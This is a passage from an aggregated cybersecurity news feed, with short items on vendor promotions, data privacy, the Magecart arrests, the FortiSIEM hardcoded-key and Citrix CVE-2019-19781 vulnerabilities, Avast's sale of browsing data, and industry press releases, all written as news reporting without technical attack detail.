  • And lastly, instead of throwing random metrics like “XX times workload reduction”, we asked our customers how Stealthwatch has helped them in their incident response and 77% agreed that it has reduced the time to detect and remediate threats from months to hours.

Multi cloud visibility

As organizations increasingly adopt the cloud, they need to ensure that their security controls extend to the cloud as well. Stealthwatch is the only network traffic analysis solution that can provide truly cloud-native visibility across all major cloud providers like Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP). And again, the deployment is agentless without the need to install multiple sensors across the infrastructure. With a single solution, you get visibility across the entire network infrastructure, on-premises to the cloud.

Integrated platform approach

We have been working on integrating Stealthwatch analytics into our security platform that spans the network, endpoint, applications and cloud. Most recently, we have integrated Stealthwatch with Cisco Threat Response. Stealthwatch sends alerts directly to Cisco Threat Response’s Incident Manager feature, allowing users to see those alerts alongside prioritized security alerts from other products such as Firepower devices. These incidents can then be investigated with additional context from your other threat response-enabled technologies, all in one console, with one click. This lowers the time required to triage and response to these alarms.

Stealthwatch is also integrated with firewall through the Cisco Defense Orchestrator for threat detection and effective policy management.

Try Stealthwatch

Customers, big and small, love and trust Stealthwatch. We count 15 of top 20 US banks, and 14 of top 20 global healthcare companies among our customers. If you would like to try the solution, you can sign up for a free 2-week Stealthwatch visibility assessment at:

Joining us at Cisco Live, Barcelona this week? Here’s a guide to all the activities and key sessions related to Stealthwatch at the event or come check out a Stealthwatch demo within the Security area at World of Solutions.

  1. As of May 2019, 94% of all Google web traffic is encrypted. And nearly 80% of web pages loaded by Firefox use HTTPS
  2. Gartner predicts that more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malware delivery, command-and-control activity, or data exfiltration – Gartner, Predicts 2017: Network and Gateway Security, December 13, 2016

The post Time for Some Straight Talk Around Network Traffic Analysis appeared first on Cisco Blogs.

Google Receives Geofence Warrants

Sometimes it's hard to tell the corporate surveillance operations from the government ones:

Google reportedly has a database called Sensorvault in which it stores location data for millions of devices going back almost a decade.

The article is about geofence warrants, where the police go to companies like Google and ask for information about every device in a particular geographic area at a particular time. In 2013, we learned from Edward Snowden that the NSA does this worldwide. Its program is called CO-TRAVELLER. The NSA claims it stopped doing that in 2014 -- probably just stopped doing it in the US -- but why should it bother when the government can just get the data from Google.

Both the New York Times and EFF have written about Sensorvault.

IDG Contributor Network: The next casualty of cyberwar could be your business

How do you prepare for truly unknown cyberattacks or threats to physical security?

It’s a question that we all have to ask in the aftermath of the missile strikes exchanged with Iran. As many are (rightly) concerned with the possibility of a traditional war starting in the Middle East, it is likely that retaliation will happen over cyberspace, putting all our networks and infrastructure at risk.

What’s most worrisome about these initial strikes is the lack of transparency. Most members of Congress had no idea the attack was imminent, and when they were briefed, many complained that their questions went unanswered.

If Congress isn’t being told what is happening, you can be sure the CISOs of major corporations aren’t being told or aware of any incidents that could have life-altering physical and cyber consequences. So with no possible coordination, how can you possibly be prepared?

To read this article in full, please click here

Zoom Bug Could Have Let Uninvited People Join Private Meetings

If you use Zoom to host your remote online meetings, you need to read this piece carefully. The massively popular video conferencing software has patched a security loophole that could have allowed anyone to remotely eavesdrop on unprotected active meetings, potentially exposing private audio, video, and documents shared throughout the session. Besides hosting password-protected virtual

Suspected Magecart Hackers Arrested in Indonesia

Suspected Magecart Hackers Arrested in Indonesia

Three men have been arrested in Indonesia in a region-wide crackdown on gangs using the infamous Magecart digital skimming code, according to Interpol.

The law enforcement organization worked with private sector partner Group-IB to identify and analyze hundreds of e-commerce websites around the world infected with the malicious JavaScript.

Its Operation Night Fury saw Interpol’s central ASEAN Cyber Capability Desk send reports to police in the affected countries, including six in southeast Asia.

One of these was Indonesia, where three men were arrested on suspicion of running Magecart C&C servers there.

According to Interpol, the suspects are thought to have been using the stolen card details to buy luxury goods and electronics and then resell them to launder their profits.

Singaporean police have also been able to disable two further C&C servers following intelligence gleaned from the operation, while investigations in other ASEAN countries are ongoing, Interpol said.

“Strong and effective partnerships between police and the cybersecurity industry are essential to ensure law enforcement worldwide has access to the information they need to address the scale and complexity of today’s cyber threat landscape,” said Interpol director of cybercrime, Craig Jones.

“This successful operation is just one example of how law enforcement is working with industry partners, adapting and applying new technologies to aid investigations, and ultimately reduce the global impact of cybercrime.”

This could well be the first time Magecart hackers have been arrested by police. Digital skimming code is now used by multiple groups around the world, making it harder for police to tackle.

The news comes just weeks after Interpol celebrated another win: a public-private partnership with Trend Micro led to the identification of over 20,000 routers in southeast Asia infected with crypto-mining malware.

Thanks to Operation Goldfish Alpha, police managed to reduce this number by 78% and efforts are continuing to identify the remaining compromised devices.

LoRaWAN Encryption Keys Easy to Crack, Jeopardizing Security of IoT Networks

New research from IOActive has found that “blindly” trusting the encryption of the widely adopted device protocol can lead to DDoS, sending of false data and other cyber attacks.

How will Cyber Essentials changes affect you?

In April, there will be a major change to the way the Cyber Essentials scheme is administered.

From 1 April 2020, in a move to standardise the requirements for Cyber Essentials certification, the National Cyber Security Centre (NCSC) will drop four of its accreditation bodies in favour of the IASME Consortium (IASME), which will operate as the sole accreditation body for the Cyber Essentials scheme.

The NCSC is the authority for appointing Cyber Essentials accreditation bodies on behalf of HMG.

How will this affect certification applications/renewals?

  • All existing certification bodies will continue to operate as normal until 31 March 2020.
  • Applicants should apply for new certification/renewal under the current scheme’s requirements through any existing certification body.
  • Certificates issued from applications that were submitted before 1 April 2020 will be valid for at least 12 months.
  • If you apply for new or renew your Cyber Essentials certification with your existing certification body by 31 March 2020, you will have until 30 June 2020 to complete the application process (provided the application was started by 31 March and is being actively progressed).
  • All existing structures that were put in place under the current scheme to obtain certification will remain valid until 31 March 2020.
  • Vulnerability scans that were required under CREST-accredited certification bodies will still be required for applications purchased before 31 March 2020.

From 1 April 2020, any organisation that wants to apply for Cyber Essentials or renew their certification will need to follow the new process as required by IASME.

What can you expect from the new process after 31 March 2020?

  • All certification processes will be standardised through IASME.
  • Vulnerability scans that were required by certain certification bodies will no longer form part of the requirements for Cyber Essentials basic certification.
  • All Cyber Essentials applications and renewals will need to be completed using the IASME self-assessment questionnaire.
  • The questionnaire requires applicants to answer open-ended questions in free text format.
  • All applications need to be manually reviewed by an assessor. The open-ended free text format could lead to a lengthier and more onerous certification review process than the existing CREST questionnaire.
  • All renewals administered through IASME will be treated similarly to new applications, meaning data for Cyber Essentials assessments will need to be entered from scratch.
  • IT Governance customers will still be able to access their completed Cyber Essentials applications in the IT Governance Cyber Essentials portal, but we will not be able to transfer any data to IASME.

We urge customers to renew their certifications before 31 March 2020, even if it means bringing forward their certifications, to avoid having to start the process from scratch.

What about Cyber Essentials Plus?

  • All Cyber Essentials Plus applications continue as normal until 31 March 2020.
  • From 1 April, Cyber Essentials basic certification will be a prerequisite of Cyber Essentials Plus. Customers will be required to achieve the basic level first, followed by the Cyber Essentials Plus element, whichmust be completed within a mandatory three-month period and could incur additional charges.

Save yourself the hassle by securing early certification renewal

As we are a CREST-accredited certification body, you can fast-track your renewal through the IT Governance online portal before 31 March and reap the benefits of a simple, fast and convenient process.

Renewing your certification with IT Governance before the IASME-controlled process begins has many benefits:


Get certified or renew your certification now. 


The post How will Cyber Essentials changes affect you? appeared first on IT Governance UK Blog.

Facial recognition firm sued for scraping 3 billion faceprints

A potential class action says Clearview AI is breaking biometrics privacy law by ransacking social media so police can match photos with IDs.

The 2020 Annual Threat Report Blog

Estimated reading time: 2 minutes

As the enterprise security brand of Quick Heal Technologies Ltd., Seqrite develops security management products across endpoints, mobile devices, servers and networks. By building upon our data on threat research, intelligence and cybersecurity, our recently released Annual Threat Report 2020 aim to provide a detailed understanding of malware of 2019.

While the full report can be found on this link, here is a brief summary of the most significant findings from the report:

Malware infection continues to be a threat

Seqrite detected over 146 million malware in 2019 which is massive in number. The highest detection of malware happened in Q4 – 2019 which saw 46 million malware detected. In terms of hourly malware detection highlights for 2019, 16,732 cases were the maximum seen.

Trojan continues to be a danger

In terms of category-wise malware detection statistics, Trojan malware continued to remain popular with just above 25 million detections in 2019. It remained a threat throughout the year, seeing a major upsurge in the last quarter.

Q4 sees a spike in malware

From the data, it is quite evident that malware sees a pronounced spike towards the end of the year. Seqrite detected 46 million malware in Q4, compared to a little above 35 million in Q3, 30 million in Q2 and 25 million in Q1. November and December 2019 also saw the largest number of malware attacks with over 18 million detected in December and above 14 million detected in November.

Real-Time Scan remains a big plus

In terms of malware detection, Real-Time protection methodology is a clear winner and a big differentiator. 51% of malware was detected through Real-Time Scan while the second most effective methodology was Behavioral Detection Scan with 23%. On-Demand Scan came a close third with 22%.

The topmost detected malware

The data showed that the following malware were detected the most on business endpoints:

  • Pioneer.CZ1 was the most detected malware detected on 22% of endpoints. It is a file infector which performs malicious activities sending it to a CNC server.
  • Sality.U was detected on 13% of endpoints and is a file infector which performs a range of harmful activities including stealing confidential data from the system
  • KillAv.Dr was detected on 12% of endpoints stealing IP information and other personal data.


The manufacturing sector remains at highest risk

The manufacturing sector saw the highest number of malware attacks in 2019 with over 8 million detections. The education and the professional sectors were second and third on the list with over 7 million and around 6 million attacks, respectively.

APT attacks will continue

The Annual Threat Report 2020 also has a detailed section on Advanced Persistent Threats (APTs) which are designed to infiltrate high-value targets important to national governments such as the military, power grids, nuclear plants, etc. APTs are typically used by nation-states for cyber warfare.

Seqrite analyzed two APT attacks against important Indian government organizations in 2019. Operation m_project is a long-running cyber-espionage campaign against Indian government organizations since 2015 and targets defence organizations, government media houses and protection & security organizations

Seqrite Labs also analyzed the alleged cyber-attack on a Nuclear Power Plant in India and tried to decipher the modus operandi. The incident raised huge questions on the security aspects of critical national infrastructure and it was alleged that an infamous group from North Korea was behind the attack. Seqrite Labs hypothesized that the targeted attack could have been carried out by spear-phishing emails.

Be sure to read the full report for more details on the key findings mentioned in the report. Seqrite continues to be the leading source for the most relevant threat intelligence in the world of enterprise security.

The post The 2020 Annual Threat Report Blog appeared first on Seqrite Blog.

Cyber Threat Trends Dashboard

Marco Ramilli published the Cyber Threat Trends Dashboard, a useful tool that will allow us to better understand most active threats in real time.


Information sharing is one of the most important activity that cybersecurity researchers do on daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most of the infosharing activities involved in cybersecurity are mostly focused on Indicator of Compromise such as: URL, IPs, Domains and file hashes which are perfectly used to arm protection tools such as: proxies, ng-firewalls and Antivirus Engines.

Cyber Threat Trends Dashboard

Collecting and analyzing public available samples every single day I became more and more interested on the Cyber threats evolution (Cyber Threats Trend) rather than specific single analyses, which after hundreds of them, could get bored (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). Regarding APT well it’s another cup of tea (a lot of passion in understanding next steps in there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends that are observed over days. The dashboard is available HERE (on top menu TOOLS => Cyber Threat Trends). So far only few basic information are showed, if you would like to see more stats/graph/infos, please feel free to contact me (HERE).


Aim of this dashboard is to monitor trends over thousands even millions of samples providing quantitative analyses on what has observed during the performed automatic analyses. The data in this dashboard is totally auto-generated without control and with no post-processing. You should consider it as raw-data where you can start to elaborate your own research and eventually where you can apply your personal filters or considerations. If you do that, you should be aware that false positives could be behind the corner Let’s move on the current graphs and let’s try to explain what I’d like to show with them but before getting in you should be aware that all the digits on the graphs are expressing percentages and not absolute numbers. Now let’s dig a little bit on them.

Cyber Threat Trends Dashboard
  • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
  • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
  • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.


The introduced dashboard is part of my cybersecurity community contribution as every free tool released on the “Tools” menu box. Cyber Threat Trends dynamically evolves over time and you might find it useful to ask questions about live statistics on cybersecurity threats. If you are a journalist or a cybsec passionate you might find some answers to trending questions to be elaborated over time.

The Cyber Threat Trends Dashboard is available on Marco Ramilli’s blog at the following URL:

Pierluigi Paganini

(SecurityAffairs – Cyber Threat Trends Dashboard, cybersecurity)

The post Cyber Threat Trends Dashboard appeared first on Security Affairs.

Staff Send 130+ Emails Per Week to Wrong Recipient

Staff Send 130+ Emails Per Week to Wrong Recipient

Staff in large enterprises send 136 emails per week to the wrong person, according to new data from Tessian released to coincide with today’s Data Protection Day.

The annual event was launched 13 years by the Council of Europe to recognize the date in 1981 that signatures were invited for Convention 108, the first legally binding international treaty on data protection.

However, despite the introduction of the GDPR nearly two years ago and the filing of over 160,000 breach notifications in the intervening period, poor data protection practices still appear to be rife.

Analyzing data from its global network of clients, Tessian claimed that corporate data is sent to unauthorized or personal email accounts nearly 200,000 times a year, for enterprises of 10,000 employees and up.

For large businesses of 1000 employees, the figure is nearly 20,000, while it drops again to around 5000 for SMBs.

Tessian CEO, Tim Sadler, claimed that human error is still the leading cause of breaches today — whether staff are deliberately breaking the rules or simply being negligent.

“Everyone has an email blunder story. After all, the average worker spends over a third of their working-week on email, so mistakes are bound to happen. But we’re seeing serious repercussions beyond just embarrassment over cc-ing the wrong person – more people are exposing personal and corporate data,” he added.

“These mistakes could see your data falling into the wrong hands and your company facing the regulator’s wrath under GDPR.”

Also known as Data Privacy Day in the US and elsewhere, the event is an opportunity to raise awareness among consumers and businesses of their respective online rights and responsibilities regarding data protection.

The GDPR has already done much to promote these within the EU and beyond, the European Commission claimed in a statement issued to mark the occasion.

“According to Eurobarometer results, the highest levels of awareness among citizens are recorded for the right to access their own data (65%), the right to correct the data if they are wrong (61%), the right to object to receiving direct marketing (59%) and the right to have their own data deleted (57%),” it revealed.

“Our priority and that of everyone involved should be to foster a harmonized and consistent implementation of data protection rules throughout the EU.”

However, the legislation remains a work in progress, according to Dob Todorov, CEO of HeleCloud.

“In truth, a chasm exists between the legal language used and the IT implementation needed to support it. And, while this chasm exists, some businesses will fail to meet the data protection standards that this regulation promotes — either accidentally or through the abuse of the grey areas,” he argued.

“As regulators look to hand out more fines, they should also focus on providing pragmatic and clear guidance at a technical level, without discriminating against current or future technologies.”

Boris Johnson gets final warning with Huawei 5G verdict imminent

Former senior government figures voice security fears as PM chairs meeting of NSC

Former ministers have sounded their final warnings to Boris Johnson about the Chinese telecoms firm Huawei ahead of his expected decision on whether it will play a part in the UK’s 5G network.

The prime minister will chair a meeting of the national security council (NSC) later on Tuesday before making a judgment on the firm’s future in the country after months of concern around security, including from the US president, Donald Trump.

5G is the next generation mobile phone network and it promises much higher connection speeds, lower latency (response times) and to be more reliable than the creaking 4G networks we have now.

Continue reading...

UK’s IoT Law Hopes to Drive Security-by-Design

UK’s IoT Law Hopes to Drive Security-by-Design

The UK government has unveiled a new consumer IoT law designed to prohibit the sale of smart products that fail to meet three strict security requirements.

Drawn up by the Department for Digital, Culture, Media and Sport (DCMS), the proposals would ensure all IoT kit sold in the UK allows users to set unique passwords and not revert them to any factory settings.

This would seem to combat the scourge of Mirai-like malware, which finds exposed devices on the internet and cracks them open with a list of popular default password choices.

Manufacturers of IoT devices would also have to provide a public point of contact so that anyone can report vulnerabilities and have them acted on “in a timely manner.”

The same IoT kit-makers would have to explicitly state the minimum length of time a device will receive security updates at point-of-sale, allowing consumers to decide whether they’re happy with vendor promises.

However, there’s no mention of enforcing a 'kitemark' for consumers which would allow buyers to easily spot whether products have met a minimum standard of security and quality. Such a standard technically exists in the UK, after the British Standards Institution (BSI) introduced one in May 2018, and at a European level, with the launch of ETSI TS 103 645 around a year ago.

It’s also unclear exactly how the UK would prohibit the sale of non-compliant IoT kit, especially items which can be sourced online from China and elsewhere. The majority of the world’s smart gadgets are not manufactured in the UK.

That said, the UK is still ahead of the US in its moves to drive regulation of an industry that exposes consumers and businesses to growing cyber risk.

“Consumer IoT devices can deliver real benefits to individuals and society, but techUK’s research shows that concerns over poor security practices act as a significant barrier to their take-up. TechUK is therefore supportive of the government’s commitment to legislate for cybersecurity to be built into consumer IoT products from the design stage,” argued techUK director of markets, Matthew Evans.

“TechUK has been working on these three principles for the past four years. We support the work to ensure that they are consistent and are influencing international standards.”

Carl Wear, head of e-crime at Mimecast, claimed that the UK push could have a beneficial impact on other parts of the world, although the nature of technology innovation would require revisions to the law.

“The legislation and any accompanying guidance will then need to be re-visited rapidly and updated to maintain an adequate minimum standard of security, as necessary,” he said. “I am certain that this move by the UK will likely prompt consideration of further regulation within other jurisdictions, in order to maintain trust in their own IoT and parity with the security of others.”

The UK’s proposals follow a “world first” voluntary code of practice introduced by the government in October 2018, on which the European standard was based.

5 Ways Your Organization Can Ensure Improved Data Security

Each year on January 28, the United States, Canada, Israel and 47 European countries observe Data Privacy Day. The purpose of Data Privacy Day is to inspire dialogue on the importance of online privacy. These discussions also seek to inspire individuals and businesses to take action in an effort to respect privacy, safeguard data and […]… Read More

The post 5 Ways Your Organization Can Ensure Improved Data Security appeared first on The State of Security.

Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM

The vendor Fortinet has finally released security patches to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Fortinet has finally released security updates to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Recently Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management FortiSIEM that can be used by attackers to the FortiSIEM Supervisor. 

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser‘, and it is stored in plain text.

“FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a condition of denial of service. 

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser‘ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

On January 15, Fortinet released a patch that removed the hardcoded public key in FortiSIEM.

Fortinet urges customers to install the patch for CVE-2019-17659, or restrict the access to FortiSIEM’s “tunneluser” port (19999). Users would upgrade to FortiSIEM version 5.2.7 and above.

Fortinet also addressed another issue in Fortinet’s FortiSIEM, tracked as CVE-2019-16153, that is related to the presence of a hardcoded password in the FortiSIEM database component. The flaw could be exploited by attackers to access the device database via the use of static credentials.

“A hard-coded password vulnerability in the FortiSIEM database component may allow attackers to access the device database via the use of static credentials.” reads the advisory published by Fortinet.

The issue affects FortiSIEM 5.2.5 and below, it could be addressed by upgrade systems to FortiSIEM 5.2.6 or above.

The issue was reported to Fortinet by the independent security researcher Srour Ganoush, “CERT CYBERPROTECT” and “Chris Armstrong from CSCI, Inc.

Pierluigi Paganini

(SecurityAffairs – Fortinet, hacking)

The post Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM appeared first on Security Affairs.

Attacks on Citrix servers increase after the release of CVE-2019-19781 exploits

Citrix has released security patches for the recently disclosed CVE-2019-19781 flaw, but the number of attacks on vulnerable systems is increasing.

Last week, Citrix addressed the actively exploited CVE-2019-19781 flaw in Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

While security researchers were warning of ongoing scans for Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers affected by the CVE-2019-19781 vulnerability, many experts were announcing the availability online of proof-of-concept exploit code ([12]).

Researchers at MDSsec published technical details of the vulnerability along with a video that shows the exploit they have developed, but they decided to not release it to avoid miscreants use it in the wild.

It has been estimated that 80,000 companies in 158 countries are potentially at risk, most of them in the U.S. (38%), followed by the UK, Germany, the Netherlands, and Australia. 

The CVE-2019-19781 vulnerability was discovered by Mikhail Klyuchnikov from Positive Technologies.

The flaw affects ADC and Gateway versions 10.5, 11.1, 12.0, 12.1, and 13.0, as well as SD-WAN WANOP versions 10.2.6 and 11.0.3.

Citrix released on Friday, the final set of permanent fixes for the vulnerability, for ADC and Gateway version 10.5.

“As with the permanent fixes made available for Citrix ADC and Citrix Gateway versions 11.1, 12.0, 12.1, 13.0, and Citrix SD-WAN 4000-WO, 5000-WO, 4100-WO, and 5100-WO earlier this week, these fixes are available to all customers regardless of whether they have an active maintenance contract with Citrix,” reads the post published by Fermin J. Serna, Chief Information Security Officer at Citrix.

Security experts are monitoring a spike in the number of attacks against Citrix servers after that researchers announced the availability online of proof-of-concept exploits for the CVE-2019-19781 flaw in Citrix NetScaler ADC and Citrix NetScaler Gateway servers.

Researchers from FireEye noticed that one of the threat actors involved in the attacks is patching the vulnerable Citrix servers, installing their own backdoor, tracked as NOTROBIN, to clean up other malware infections and to lock out any other threat from exploiting the CVE-2019-19781 Citrix flaw.

The NOTROBIN backdoor was designed to prevent subsequent exploitation of the flaw on Citrix servers and also to establish backdoor access, a circumstance that suggests that attackers are preparing future attacks. 

It is easy to predict that threat actors will continue to target organizations that will delay in applying the permanent patches or the mitigations. Organizations using Citrix appliances could use the tool released by the company to check for any signs of compromise.

Pierluigi Paganini

(SecurityAffairs – Citrix, hacking)

The post Attacks on Citrix servers increase after the release of CVE-2019-19781 exploits appeared first on Security Affairs.

Data breach: Why it’s time to adopt a risk-based approach to cybersecurity

The recent high-profile ransomware attack on foreign currency exchange specialist Travelex highlights the devastating results of a targeted cyber-attack. In the weeks following the initial attack, Travelex struggled to bring its customer-facing systems back online. Worse still, despite Travelex’s assurances that no customer data had been compromised, hackers were demanding $6 million for 5GB of sensitive customer information they claim to have downloaded. Providing services to some of the world’s largest banking corporations including HSBC, … More

The post Data breach: Why it’s time to adopt a risk-based approach to cybersecurity appeared first on Help Net Security.

How to detect and prevent issues with vulnerable LoRaWAN networks

IOActive researchers found that the LoRaWAN protocol – which is used across the globe to transmit data to and from IoT devices in smart cities, Industrial IoT, smart homes, smart utilities, vehicle tracking and healthcare – has a host of cyber security issues that could put network users at risk of attack. Such attacks could cause widespread disruption or in extreme cases even put lives at risk. Session Keys and Functions in LoRaWAN v1.0.3 Vulnerable … More

The post How to detect and prevent issues with vulnerable LoRaWAN networks appeared first on Help Net Security.

Are Companies Adhering to CCPA Requirements?

Some Are Not Giving Customers Option to Opt out of Data Sale, Legal Experts Say
Many companies that should be offering customers the ability to "opt out" of the sale of their information under the California Consumer Privacy Act are failing to do so because of the law's ambiguities, some legal experts say. CCPA went into effect Jan. 1, but it won't be enforced until July.

52% of companies use cloud services that have experienced a breach

Seventy-nine percent of companies store sensitive data in the public cloud, according to a McAfee survey. Anonymized cloud event data showing percentage of files in the cloud with sensitive data While these companies approve an average of 41 cloud services each, up 33 percent from last year, thousands of other services are used ad-hoc without vetting. In addition, 52 percent of companies use cloud services that have had user data stolen in a breach. By … More

The post 52% of companies use cloud services that have experienced a breach appeared first on Help Net Security.

Avast Subsidiary Sells User Browsing History

A subsidiary of Avast antivirus is selling sensitive user browsing data to many companies, including Revlon, Microsoft, Google, Yelp, Condé Nast, and TripAdvisor.

According to a recent joint investigation by Vice’s Motherboad and PCMag, highly granular and sensitive user data from users of Avast antivirus is being repackaged and sold to companies via a subsidiary called Jumpshot which promises buyers of the data information on “Every search. Every click. Every buy. On every site.”

Avast’s “free” or “freemium” antivirus software has over 435 million active users, with 100 million devices feeding data into Jumpshot, including, Google searches, LinkedIn activity, Youtube activity, and activity on pornographic websites. According to the Motherboard article, “multiple Avast users… were not aware Avast sold browsing data, raising questions about how informed that consent is.”

The primary method of Avast’s data collection was initially via web browser plugins distributed through subsidiaries such as AVG. After privacy concerns were raised by security researchers, Google, Mozilla, and Firefox removed and banned these extensions from their respective web browsers. Since then, the company has begun harvesting user information through its anti-virus software. 

Representatives from Avast responded to the report by emphasizing that users can opt out of their data collection, and that any data collected is anonymized.

“We have a long track record of protecting users’ devices and data against malware, and we understand and take seriously the responsibility to balance user privacy with the necessary use of data,” the company announced in a statement. 

Critics of the company’s data collection policies responded to this statement with skepticism.

“It’s almost impossible to de-identify data,” said law professor Eric Goldman. “When they promise to de-identify the data, I don’t believe it.”

Read the article here.

The post Avast Subsidiary Sells User Browsing History appeared first on Adam Levin.

Navigating ICS Security: Having your Action Plan Ready

Trust, respect, understanding. These are all two-way relationships that must be earned over time. Whilst someone being hired in a senior position will likely already have a certain level of each, part of your job is to continuously cultivate all three of these elements with colleagues no matter your grade. When working within a cybersecurity […]… Read More

The post Navigating ICS Security: Having your Action Plan Ready appeared first on The State of Security.

Benefits of blockchain pilot programs for risk management planning

Through 2022, 80% of supply chain blockchain initiatives will remain at a proof-of-concept (POC) or pilot stage, according to Gartner. One of the main reasons for this development is that early blockchain pilots for supply chain pursued technology-oriented models that have been successful in other sectors, such as banking and insurance. However, successful blockchain use cases for supply chain require a different approach. “Modern supply chains are very complex and require digital connectivity and agility … More

The post Benefits of blockchain pilot programs for risk management planning appeared first on Help Net Security.

Plights of the Round Table – Strategic Lessons from the Casino

In Part 1 of the Plights of the Round Table, the executive staff of Camelot was working on the strategic plan for the following year. Morgan, the CEO, needs to decide how to spend her limited budget for the best interest of Camelot. Lana, the VP of Sales, thinks they should invest in horses for […]… Read More

The post Plights of the Round Table – Strategic Lessons from the Casino appeared first on The State of Security.

Security Compass enables CSPs to set up and develop their FedRAMP initiatives

Security Compass, a software security company that provides organizations with technology to make software secure, has introduced feature enhancements to SD Elements that enable cloud service providers (CSPs) to set up and develop their Federal Risk and Authorization Management Program (FedRAMP) continuous compliance initiatives in a coherent and structured way. Available now, SD Elements customers will automatically receive FedRAMP reporting capabilities supported by new FedRAMP content in the knowledgebase, and SD Elements tasks with additional … More

The post Security Compass enables CSPs to set up and develop their FedRAMP initiatives appeared first on Help Net Security.

Cisco’s first Cybersecurity Co-Innovation Center in Europe opens in Milan

Cisco‘s first Cybersecurity Co-Innovation Center in Europe opened its doors in Milan at the Leonardo da Vinci Science and Technology Museum. The center was inaugurated in the presence of Paola Pisano, Minister for Technological Innovation and Digitization; Roberto Baldoni, Deputy Director General of DIS (Prime Ministerial Department of Security Information); and Giuseppe Sala, Mayor of Milan. Cisco Chairman and CEO Chuck Robbins gave the inaugural address, joined by the CEO of Cisco Italy, Agostino Santoni, … More

The post Cisco’s first Cybersecurity Co-Innovation Center in Europe opens in Milan appeared first on Help Net Security.

Cybraics partners with AVANT to expand reach of its AI-backed threat detection services

Cybersecurity and analytics firm Cybraics announced a partnership with AVANT, an IT decision-making platform for next-generation technologies, further expanding the reach of the company’s artificial intelligence-backed threat detection services. “We are excited to partner with AVANT to offer our advanced threat detection services throughout their nationwide network of Trusted Advisors,” said Nate Grinnell, Vice President of Sales, Cybraics. “Robust cybersecurity practices are essential for the health of all companies, but many still have limited resources … More

The post Cybraics partners with AVANT to expand reach of its AI-backed threat detection services appeared first on Help Net Security.

Alfresco and Tech Mahindra collaborate on four jointly-developed insurance solutions

Alfresco Software, an open source content, process and governance software company, and Tech Mahindra, a leading provider of digital transformation, consulting and re-engineering services and solutions, announced collaboration on four jointly-developed, transformative insurance solutions. The collaboration combines Tech Mahindra’s insurance expertise and experience in the insurance industry with Alfresco’s powerful Digital Business Platform to create solutions for risk management, automated underwriting, a self-learning chatbot, and intelligent claims handling. Gautam Bhasin, Global Head – Banking, Financial … More

The post Alfresco and Tech Mahindra collaborate on four jointly-developed insurance solutions appeared first on Help Net Security.

SecureLink announces distribution partnership with ShiftLeft for GCC and Egypt

SecureLink, a risk advisory firm based in Dubai and part of the StarLink group, the region’s “True” Value-Added-Distributor (VAD), announced signing a distribution partnership with ShiftLeft for GCC and Egypt. ShiftLeft is the fastest and most accurate application security testing product in the industry. It integrates directly into DevOps pipelines via pull request or build, and it can analyze 500,000 lines of code in under 10 minutes. This enables AppSec teams to insert security into … More

The post SecureLink announces distribution partnership with ShiftLeft for GCC and Egypt appeared first on Help Net Security.

Cymatic selects security experts for advisory roles

Cymatic announced the launch of its advisory board, a community of international security and risk experts providing brand counsel, technical guidance, and market leadership to ensure the success and relevance of the Cymatic next-generation all-in-one web application defense platform. Cymatic offers the only unified security platform that deploys at the client through a simple line of JavaScript without agents or proxies to deliver first-look, first-strike capability that is earliest in the kill chain. It provides … More

The post Cymatic selects security experts for advisory roles appeared first on Help Net Security.

Sixgill appoints Meira Primes as chief marketing officer

Sixgill, a leading threat intelligence company, has appointed Meira Primes, a veteran strategist and marketer, as chief marketing officer. The appointment comes as Sixgill announced it is moving into larger offices to support growth as the company continues to capitalize on increased market recognition and demand for the company’s threat intelligence platform. In her role, Primes will be responsible for overall marketing strategy, brand management, public relations, and lead generation – guiding the overall sales … More

The post Sixgill appoints Meira Primes as chief marketing officer appeared first on Help Net Security.

SoftServe attains Data Analytics Specialization in Google Cloud Premier Partner Program

SoftServe, a leading digital authority and consulting company, has achieved the Data Analytics Specialization in the Google Cloud Premier Partner Program. This Partner Specialization affirms that SoftServe has demonstrated success turning large amounts of data into insights using Google Cloud Platform (GCP) technology. The company also recently surpassed a milestone 400 GCP certifications. “SoftServe has the proficiency and expertise with GCP technology that allow us to turn huge amounts of unstructured data into actionable insights … More
